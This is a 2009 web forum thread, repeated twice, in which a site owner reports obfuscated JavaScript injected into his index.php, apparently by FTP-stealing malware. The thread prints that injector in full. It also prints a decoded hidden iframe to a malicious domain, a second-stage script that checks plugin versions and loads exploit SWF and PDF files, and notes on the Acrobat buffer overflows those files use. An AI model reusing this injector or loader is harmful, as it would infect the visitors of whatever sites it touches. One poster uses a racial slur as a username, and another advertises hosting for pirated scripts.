Someone hacked my website- Anyone can help me? - GSM-Forum

=MobileMan= · 05-06-2009, 20:00

I run a forum (Non GSM related), and the forum is stored in a /forum/ directory.

In the root of my domain, I only have the index.php file which is like a disclaimer, within only basic HTML.

Problem is- there past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus.

I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE

It would start using VERY HIGH memory resourses, but seem to do nothing else.

After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

PHP Code:

  <?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?>

Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.

I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.

I'm also worried that they have uploaded something else on my server too, and not just added this coding.

Can anyone give me any help with this?

Thanks

mrx3net · 05-06-2009, 21:03

maybe you are running an infected vb

mrx3net · 05-06-2009, 21:43

if you need a good host ( offshore and you can run nulled script and 100% safe ) contact me

=MobileMan= · 05-06-2009, 23:34

I've been running this VB for about 8 months with no problem.

Thousand's of people are using the release I'm using with no issue- so it can't be the problem.

Problem is someone has managed to add this script to my index.php file (Not the VB index.php file).

maxmix · 05-07-2009, 01:35

I have the same also at www.hhd.co.uk and my IP willnot even help me fix my page....

Any ideas ? Can you virus scan and repair a web page as you would your PC ?

maxmix

=MobileMan= · 05-07-2009, 04:36

Quote:

Originally Posted by maxmix

I have the same also at www.hhd.co.uk and my IP willnot even help me fix my page....

Any ideas ? Can you virus scan and repair a web page as you would your PC ?

maxmix

Check your index.html or index.php file

See if any code has been added to it that shouldn't be there.

papsnew · 05-07-2009, 05:34

@mobileman
According to your Avatar (location) you seem to be in bed with someones wife.Could it be the reason you are having these problems?

maxmix · 05-07-2009, 07:51

Quote:

Originally Posted by =MobileMan=

Check your index.html or index.php file

See if any code has been added to it that shouldn't be there.

Hi M8

Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again....

It's happened about 6 times now every time I fix it... Can you help...

How can they keep altering my index file ? Has my FTP password been comprmised, this is the only thing I have never changed...

I gave up on it lol

maxmix

=MobileMan= · 05-07-2009, 15:04

Quote:

Originally Posted by maxmix

Hi M8

Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again....

It's happened about 6 times now every time I fix it... Can you help...

How can they keep altering my index file ? Has my FTP password been comprmised, this is the only thing I have never changed...

I gave up on it lol

maxmix

No idea mate this is what I'm trying to find out.

Can anyone tell me how this code has been injected to my index.php file?

Or explain to me in simple terms how this script works?

Thanks

Digidestination · 05-07-2009, 15:32

Most probably all your FTP user info was hijacked by an FTP Trojan.

1.Scan your PC
2.Change FTP password
3.Remove all bad code manually
4.Report to your hosting Provider

If you have problem with removing this code, contact me I may be able to help you. Use my website contact form.
www.digidestination.com

NIGGERS · 05-07-2009, 16:46

That javascript blabla comes out to:

Code:

<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

It opens an iframe to that dodgey site which then runs the script that contains 2 infected exploits, one being a .swf file and one being an .pdf

Code:

<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>

File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47).

Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions:
util.printf() - if an attacker sends a string long enough to generate a
stack-based buffer overflow he will then be able to
execute arbitrary code on user's computer with the
same level privileges as the user who opened the PDF
file
Collab.colectEmailInfo() - a stack-based buffer overflow can be
caused by passing a string long enough (at least 44952
characters) as a parameter in the msg field of this
function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.

I can conclude that the following people are vurnable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2

=MobileMan= · 05-08-2009, 01:55

Thanks very much to both of you.

Your right my PC was infected (Nod32 never found anything), but uninstalled, the installed Avast, done a boot scan and it found and deleted loads.

Site seems fine now, and I've changed my FTP passwords juts incase.

Cheers very much for the help, and info on what the script was actually doing.

=MobileMan= · 05-09-2009, 03:35

OK Update-

Today I've found out that ALL of my sites have been injected with this malicious code.

Sites are stored on 2 different servers.

One of the things Avast said it found on my PC and removed was a rootkit.

I'm guessing it's not removed it completely, and whatevers on my PC is actually injecting the code to all my websites index.php or index.html pages by accessing my FTP accounts.

Does anyone have any idea how to remove this from my PC fully?

I've tried Avast, and also Superantispyware.

Thanks

05-06-2009, 20:00	#1 (permalink)
=MobileMan= Freak Poster Join Date: Aug 2007 Age: 50 Posts: 233 Member: 565867 Status: Offline Thanks Meter: 15	Someone hacked my website- Anyone can help me? I run a forum (Non GSM related), and the forum is stored in a /forum/ directory. In the root of my domain, I only have the index.php file which is like a disclaimer, within only basic HTML. Problem is- there past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus. I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE It would start using VERY HIGH memory resourses, but seem to do nothing else. After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file: PHP Code: <?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?> Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host. I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again. I'm also worried that they have uploaded something else on my server too, and not just added this coding. Can anyone give me any help with this? Thanks

05-07-2009, 15:32	#10 (permalink)
Digidestination Junior Member Join Date: May 2009 Posts: 1 Member: 1026294 Status: Offline Sonork: 3101 Thanks Meter: 1	Change your Passwords Most probably all your FTP user info was hijacked by an FTP Trojan. 1.Scan your PC 2.Change FTP password 3.Remove all bad code manually 4.Report to your hosting Provider If you have problem with removing this code, contact me I may be able to help you. Use my website contact form. www.digidestination.com

05-07-2009, 16:46	#11 (permalink)
NIGGERS Junior Member Join Date: May 2009 Posts: 1 Member: 1026333 Status: Offline Thanks Meter: 1	That javascript blabla comes out to: Code: <iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> It opens an iframe to that dodgey site which then runs the script that contains 2 infected exploits, one being a .swf file and one being an .pdf Code: <script> function mjnhyua() { return 'ra'+'m'; } for(i=0;navigator.plugins[i];i++){ regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)'); var ertdfg = "dfgdfgdfgdf43565gkui"; result=regexp.exec(navigator.plugins[i]['description']); ertdfg = "dfgdfgdfgdf43565gkui"; if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) { ertdfg = "dfgdfgdfgdf43565gkui"; document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>'); ertdfg = "dfgdfgdfgdf43565gkui"; break; } } for(i=0;navigator.plugins[i];i++){ name=navigator.plugins[i].name; if(name.indexOf('Adobe Acrobat')!=-1){ document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>'); break; } } </script> File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125 Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47). Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions: util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow he will then be able to execute arbitrary code on user's computer with the same level privileges as the user who opened the PDF file Collab.colectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function. The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult. The javascript code inside the PDF file is used to download and execute other malware on user's computer. I can conclude that the following people are vurnable to this exploit: people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
anyone can help me fix my ipod ? :/	TRABEL	iPhone 2 / iPhone 3G / iPhone 3GS	6	12-03-2007 04:54
Please Anyone can help me with my 6280	sokolibrahimi	Nokia Base Band 5 ( BB-5 )	2	11-20-2007 15:28
Anyone Can Help Me With My V3x	etereo12	Motorola P2k	1	08-23-2006 17:07
pls anyone can help me with my ufs3	bygeeson	UFS2 + UFS3-Tornadoflasher	2	05-13-2006 15:18
Anyone can help me with my fighter?	ez2dj	Cruiser Suite	10	10-15-2004 01:42

05-06-2009, 21:03	#2 (permalink)
mrx3net No Life Poster Join Date: Apr 2009 Location: Mor Posts: 1,507 Member: 1006514 Status: Offline Thanks Meter: 640	maybe you are running an infected vb

05-06-2009, 21:43	#3 (permalink)
mrx3net No Life Poster Join Date: Apr 2009 Location: Mor Posts: 1,507 Member: 1006514 Status: Offline Thanks Meter: 640	if you need a good host ( offshore and you can run nulled script and 100% safe ) contact me

05-06-2009, 23:34	#4 (permalink)
=MobileMan= Freak Poster Join Date: Aug 2007 Age: 50 Posts: 233 Member: 565867 Status: Offline Thanks Meter: 15	I've been running this VB for about 8 months with no problem. Thousand's of people are using the release I'm using with no issue- so it can't be the problem. Problem is someone has managed to add this script to my index.php file (Not the VB index.php file).

05-07-2009, 01:35	#5 (permalink)
maxmix Freak Poster Join Date: Dec 2002 Location: Scotland Posts: 451 Member: 18535 Status: Offline Thanks Meter: 11	I have the same also at www.hhd.co.uk and my IP willnot even help me fix my page.... Any ideas ? Can you virus scan and repair a web page as you would your PC ? maxmix

05-07-2009, 05:34	#7 (permalink)
papsnew Freak Poster Join Date: Nov 2006 Location: Nairobi,Kenya Posts: 465 Member: 390521 Status: Offline Thanks Meter: 57	@mobileman According to your Avatar (location) you seem to be in bed with someones wife.Could it be the reason you are having these problems?

05-08-2009, 01:55	#12 (permalink)
=MobileMan= Freak Poster Join Date: Aug 2007 Age: 50 Posts: 233 Member: 565867 Status: Offline Thanks Meter: 15	Thanks very much to both of you. Your right my PC was infected (Nod32 never found anything), but uninstalled, the installed Avast, done a boot scan and it found and deleted loads. Site seems fine now, and I've changed my FTP passwords juts incase. Cheers very much for the help, and info on what the script was actually doing.

05-09-2009, 03:35	#13 (permalink)
=MobileMan= Freak Poster Join Date: Aug 2007 Age: 50 Posts: 233 Member: 565867 Status: Offline Thanks Meter: 15	OK Update- Today I've found out that ALL of my sites have been injected with this malicious code. Sites are stored on 2 different servers. One of the things Avast said it found on my PC and removed was a rootkit. I'm guessing it's not removed it completely, and whatevers on my PC is actually injecting the code to all my websites index.php or index.html pages by accessing my FTP accounts. Does anyone have any idea how to remove this from my PC fully? I've tried Avast, and also Superantispyware. Thanks